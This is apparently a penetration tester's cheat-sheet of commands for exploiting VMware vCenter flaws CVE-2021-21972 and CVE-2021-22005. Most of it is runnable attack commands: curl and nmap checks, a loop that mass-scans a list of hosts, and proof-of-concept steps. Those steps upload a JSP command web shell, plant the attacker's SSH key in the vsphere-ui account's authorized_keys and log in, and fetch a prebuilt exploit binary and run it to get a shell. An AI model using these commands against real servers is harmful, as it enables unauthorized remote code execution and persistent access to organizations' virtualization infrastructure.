CVE-2021-44228


CVE-2021-21972

Research credit to: https://swarm.ptsecurity.com/unauth-rce-vmware/http://noahblog.360.cn/vcenter-6-5-7-0-rce-lou-dong-fen-xi/

horizon3ai/CVE-2021-21972

This script looks the existence of CVE-2021-21972 based on the following PATH "/ui/vropspluginui/rest/services/uploadova" trough a POST request and looking in response body (500) the words "uploadFile", that means the vCenter is avaiable to accept files via POST without any restrictions

NMAP Cheker:

wget <https://raw.githubusercontent.com/alt3kx/CVE-2021-21972/main/CVE-2021-21972.nse>
**sudo nmap -p443 --script ~/CVE/CVE-2021-21972/CVE-2021-21972.nse 10.1.43.11**

Manual inspection:

curl -i -s -k -X $'GET' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' $'<https://10.1.43.11/ui/vropspluginui/rest/services/getstatus>'
curl -i -s -k -X $'GET' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' $'<https://10.1.43.11/ui/vropspluginui/rest/services/uploadova>'
curl -i -s -k -X $'POST' -H $'Host: 10.1.43.11' -H $'User-Agent: clevergod' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 0' $'<https://10.1.43.11/ui/vropspluginui/rest/services/uploadova>'

PoC:

git clone <https://github.com/horizon3ai/CVE-2021-21972.git>; cd CVE-2021-21972; chmod +x CVE-2021-21972.py
#WINDOWS
python3 CVE-2021-21972.py -t 10.1.43.11 -f cmdjsp.jsp -p 'ProgramData\\VMWare\\vCenterServer\\data\\perfcharts\\tc-instance\\webapps\\statreport\\cmdjsp.jsp' -o win
#LINUX
python3 CVE-2021-21972.py -t 10.1.43.11 -f /home/clevergod/.ssh/id_rsa.pub -p /home/vsphere-ui/.ssh/authorized_keys -o unix
ssh 10.1.43.11 -l vsphere-ui

#CVE-2021-22005

one-liner mass checker

cat vmware_centers.txt | while read S do; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "<https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test>" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \\033[1;35mVulnerable\\e[0m\\n" || printf "$S \\033[1;32mPatched\\e[0m\\n"; done;

PoC:

wget <https://github.com/r0ckysec/CVE-2021-22005/raw/main/exp/cve-2021-22005_exp_linux>; chmod +x cve-2021-22005_exp_linux;
./cve-2021-22005_exp_linux -u <https://URL> --shell